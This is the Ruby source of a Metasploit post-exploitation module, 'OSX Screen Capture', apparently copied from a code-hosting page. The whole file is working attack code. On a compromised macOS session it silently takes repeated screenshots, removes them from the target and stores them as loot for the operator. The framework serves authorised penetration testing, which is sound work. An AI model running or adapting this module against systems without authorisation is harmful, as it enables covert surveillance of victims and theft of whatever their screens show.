Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'OSX Screen Capture',
15
        'Description' => %q{
16
          This module takes screenshots of target desktop and automatically downloads them.
17
        },
18
        'License' => MSF_LICENSE,
19
        'Author' => [
20
          'Peter Toth <globetother[at]gmail.com>' # ported windows version to osx
21
        ],
22
        'Platform' => [ 'osx' ],
23
        'SessionTypes' => [ 'meterpreter', 'shell' ]
24
      )
25
    )
26

27
    register_options(
28
      [
29
        OptEnum.new('FILETYPE',
30
                    [true, 'File format to use when saving a snapshot', 'png', %w[png gif]]),
31
        OptInt.new('DELAY', [true, 'Interval between screenshots in seconds. 0 for no delay', 10]),
32
        OptInt.new('COUNT', [true, 'Number of screenshots to collect.', 1]),
33
        OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/tmp/<random>']),
34
        OptString.new('EXE_PATH', [true, 'Path to remote screencapture executable', '/usr/sbin/screencapture'])
35
      ]
36
    )
37
  end
38

39
  def run
40
    file_type = datastore['FILETYPE'].shellescape
41
    exe_path = datastore['EXE_PATH'].shellescape
42
    tmp_path = datastore['TMP_PATH'].gsub('<random>', Rex::Text.rand_text_alpha(8)).shellescape
43
    if datastore['COUNT'] < 1
44
      count = 1
45
    else
46
      count = datastore['COUNT']
47
    end
48
    if datastore['DELAY'] < 0
49
      delay = 0
50
    else
51
      delay = datastore['DELAY']
52
    end
53

54
    if !file?(exe_path)
55
      print_error('Aborting, screencapture binary not found.')
56
      return
57
    end
58

59
    print_status "Capturing #{count} screenshots with a delay of #{delay} seconds"
60
    # calculate a sane number of leading zeros to use.  log of x  is ~ the number of digits
61
    leading_zeros = Math.log10(count).round
62
    file_locations = []
63

64
    count.times do |num|
65
      Rex.sleep(delay) unless num <= 0
66

67
      begin
68
        # This is an OSX module, so mkdir -p should be fine
69
        cmd_exec("mkdir -p #{tmp_path}")
70
        filename = Rex::Text.rand_text_alpha(7)
71
        file = "#{tmp_path}/#{filename}"
72
        cmd_exec("#{exe_path} -x -C -t #{file_type} #{file}")
73
        data = read_file(file)
74
        file_rm(file)
75
      rescue ::Rex::Post::Meterpreter::RequestError => e
76
        print_error('Error taking the screenshot')
77
        vprint_error("#{e.class} #{e} #{e.backtrace}")
78
        return
79
      end
80

81
      unless data
82
        print_error("No data for screenshot #{num}")
83
        next
84
      end
85

86
      begin
87
        # let's loot it using non-clobbering filename, even tho this is the source filename, not dest
88
        fn = "screenshot.%0#{leading_zeros}d.#{file_type}" % num
89
        location = store_loot('screen_capture.screenshot', "image/#{file_type}", session, data, fn, 'Screenshot')
90
        vprint_good("Screenshot #{num} saved on #{location}")
91
        file_locations << location
92
      rescue ::IOError, ::Errno::ENOENT => e
93
        print_error('Error storing screenshot')
94
        vprint_error("#{e.class} #{e} #{e.backtrace}")
95
        return
96
      end
97
    end
98

99
    print_status('Screen Capturing Complete')
100
    if file_locations && !file_locations.empty?
101
      print_status('Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot')
102
    end
103
  end
104
end
105

106